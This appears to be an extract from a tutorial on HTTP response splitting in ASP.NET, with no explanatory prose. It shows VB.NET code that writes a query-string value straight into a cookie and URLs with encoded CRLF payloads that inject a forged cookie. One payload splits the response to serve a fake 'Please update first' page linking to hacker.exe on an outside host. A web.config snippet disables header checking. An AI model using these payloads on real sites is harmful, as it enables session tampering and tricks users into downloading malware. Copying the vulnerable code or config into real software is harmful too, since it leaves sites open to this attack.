Dim MyCookie As New HttpCookie("mycookie",Request.Querystring("cookie")) Response.AppendCookie(mycookie)
http://site/cookies.aspx?cookie=123%0D%0ASet-Cookie%3A%20hackercookie=hacked
HTTP/1.1 200 OK Server: Microsoft-IIS/5.1 Date: Thu, 5 Mar 2009 14:11:50 GMT X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: mycookie=123 Cache-Control: private Content-Type: text/html; charset=utf-8
HTTP/1.1 200 OK Server: Microsoft-IIS/5.1 Date: Thu, 5 Mar 2009 14:11:50 GMT X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: mycookie=123 Set-Cookie: hackercookie=hacked Cache-Control: private Content-Type: text/html; charset=utf-8
http://thesite.com/something.aspx?id=9999%0d%0a Content-Length:+22%0d%0a%0d%0a<html>%0d%0a<a href=www.hacker.com/hacker.exe> Please update first </a>%0d%0a</html>%0d%0aHTTP/1.1
HTTP/1.1 200 OK Server: Microsoft-IIS/5.1 Date: Thu, 20 Sep 2007 20:11:50 GMT X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: mycookie=123%0D%0ASet-Cookie:HackedCookie=Hacked Cache-Control: private Content-Type: text/html; charset=utf-8
<configuration> <system.web> <httpRuntime enableHeaderChecking="false" /> </system.web> </configuration>